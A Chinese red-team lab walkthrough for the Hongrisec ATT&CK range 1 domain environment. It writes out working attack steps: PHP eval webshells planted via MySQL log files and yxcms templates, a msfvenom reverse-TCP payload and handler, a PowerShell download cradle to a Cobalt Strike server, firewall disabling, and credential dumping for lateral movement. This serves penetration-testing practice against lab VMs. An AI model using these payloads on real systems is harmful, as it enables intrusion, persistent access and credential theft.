ATT&CK 红队实战 1

信息收集发现 phpmyadmin并且是弱口令通过日志文件进行getshell ；yxcms的网页通过漏洞利用get到shell，拿cs控制后进行内网信息收集以及横向移动，最终用窃取的凭证横向移动到域控主机，使用黄金票据获取域内主机，最终实现整个域的控制。

拓扑图 

环境搭建

下载链接  漏洞详情

网络配置

VUL-Win7  网络适配器  仅主机模式  网络适配器2 NAT

VUL-Windows Server 2008   仅主机模式

VUL-Metasploit  网络适配器    仅主机模式

三个靶机的默认密码：hongrisec@2019

信息收集

 端口扫描   开放端口：80，3306

访问80端口，发现php 探针 

扫描二维码关注公众号，回复： 16702074 查看本文章

目录扫描

扫描出phpmyadmin，我们使用phpmyadmin上传shell

phpmyadmin 传入shell

登录phpmyadmon，尝试用sql语句写文件select '<?php phpinfo();?>' into outfile 'C:/phpStudy/WWW/phpinfo.php'结果因为MySQL服务器使用--secure file priv选项运行，所以无法执行此语句

尝试使用日志文件写入shell，查看日志文件开启状态   show variables like '%general%'

开启日志功能    set global general_log=on

 查看日志文件开启状态   show variables like '%general%' 

修改日志保存路径为       set global general_log_file='C:/phpStudy/WWW/shell.php' 

 查看是否修改成功  show variables like '%general%'

查询一句话木马：SELECT '<?php eval($_POST["cmd"]);?>' 

 蚁剑连接shell，连接密码：cmd，获取权限成功 

连接路径：http://192.168.153.129/shell.php

yxcms渗透攻击

方案1：info.php传入shell文件

进入登陆界面http:// http://192.168.153.129/yxcms//index.php?r=admin，账号admin，密码123456

登陆--管理首页--前台模板--管理模板文件--info.php

上传shell    <?php @eval($_REQUEST[A])?> ,点击保存

info.php  存储路径查找

protected/apps/default/view

使用百度，搜索yxcms目录结构和框架可以获取文件路径（直观）

使用蚁剑，连接shell 

连接路径  http://192.168.153.129/yxcms/protected/apps/default/view/default/info.php

方案2：前台搜索  传入shell文件

登陆--管理首页--前台模板--管理模板文件--index_search.php

上传shell   <?php @eval($_POST[a])?>    连接密码：a

 进入网站yxcms的搜索界面，搜索任意关键字

 搜索内容的链接，搜索任意关键字就可以触发这个shellhttp://192.168.153.129/yxcms/index.php?r=default%2Findex%2Fsearch&keywords=aaa&type=all

搜索界面进行连接shell

文件路径获取shell,连接密码a，文件路径可以从beifen文件中获取，也可以在百度上搜索

http://yxcms/protected/apps/default/view/default/index_search.php

收集系统信息

ipconfig /all  //查看网络配置
netsh  advfirewall  show  allprofiles//查看防火墙状态
netsh advfirewall set allprofiles state off  //关闭防火墙

msfvenom+MSF  权限获取

虚拟机IP地址：  192.168.153.133

Win 7 IP地址：   192.168.153.129

使用msfvenom上传木马 exe文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.153.133 lport=4444 -f exe -o re.exe

 在root用户的文件夹下会有这个生成的re.exe木马文件，我们使用mv命令移动到kali（普通用户）文件夹下，然后移动到其他系统，在中国蚁剑进行上传exe文件

 反弹shell连接msf

msfconsole
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.153.133 //kali的IP地址
set lport 4444    //配置端口号
run

 win7 信息收集

run post/windows/gather/enum_patches  //收集补丁信息
run post/windows/gather/enum_applications  //查看程序上软件

添加路由

run autoroute -s 192.168.52.0 255.255.255.0  //添加路由
run autoroute -p  //查看路由

内网渗透

run post/windows/gather/arp_scanner rhosts=192.168.52.0/24

background  //隐藏到后台运行
use auxiliary/server/socks5
show options
run

 CS  内网渗透

 软件启动

//CS启动
sudo  ./teamserver 192.168.153.133 123456
./start.sh

设置监听器

因为win7是web服务器，所以使用HTTP来建立连接，这意味着cs不能主动联系肉鸡，只能肉鸡来主动连接cs接收命令。默认情况下肉鸡会每隔60秒来cs服务端下载命令，在服务端执行完命令之后，会把命令的执行结果以HTTP的POST方式传到服务端。

 生成木马文件

攻击--钓鱼攻击--Script Web Delivery

 

//生成的命令，我修改URL路径修改为b，不影响
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.153.133:80/b'))"

端口扫描

 shell nmap -sP 192.168.52.0/24

使用工具nmap扫描 192.168.52.141   shell nmap --script=vuln  192.168.52.141

使用工具nmap扫描 192.168.52.138     shell nmap --script=vuln  192.168.52.138

 使用工具nmap扫描 192.168.52.143     shell nmap --script=vuln  192.168.52.143

 列出域控  net  dclist 

获取系统用户名密码

beacon> logonpasswords

凭证信息

 建立隧道

因为192.168.52.0/24段不能直接连接到攻击机 地址，所以需要CS派生smb beacon。让内网的主机连接到win7上。

添加目标信息

最终的实验效果